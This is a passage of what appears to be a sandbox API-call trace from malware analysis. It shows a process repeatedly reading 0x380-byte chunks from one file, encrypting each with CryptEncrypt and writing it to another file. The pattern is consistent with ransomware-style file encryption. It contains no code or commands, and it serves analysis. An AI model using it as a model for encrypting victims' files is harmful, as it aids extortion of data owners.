lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.362] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.363] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.363] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.363] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.363] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.363] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.363] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.363] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.364] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.365] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.366] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.367] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.367] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.367] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.367] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.367] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.367] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.367] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.368] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.369] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.370] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.371] ReadFile (in: hFile=0x5d4c, 